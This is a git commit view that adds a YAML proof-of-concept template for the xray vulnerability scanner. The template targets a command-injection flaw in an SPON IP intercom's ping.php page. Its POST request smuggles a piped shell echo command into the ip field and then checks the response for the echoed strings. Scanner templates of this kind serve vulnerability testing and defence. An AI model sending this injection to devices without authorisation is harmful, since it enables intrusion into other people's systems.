优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
@@ -0,0 +1,19 @@
name: poc-yaml-spon-ip-intercom-ping-rce
set:
r1: randomLowercase(10)
r2: randomLowercase(10)
r3: randomLowercase(10)
r4: randomLowercase(10)
rules:
- method: POST
path: /php/ping.php
headers:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
body: |
jsondata[ip]=%7C echo {{r1}}${{{r2}}}{{r3}}^{{r4}}&jsondata[type]=0
expression: response.status == 200 && (response.body.bcontains(bytes(r1 + r3 + "^" + r4)) || response.body.bcontains(bytes(r1 + "${" + r2 + "}" + r3 + r4)))
detail:
author: york
links:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9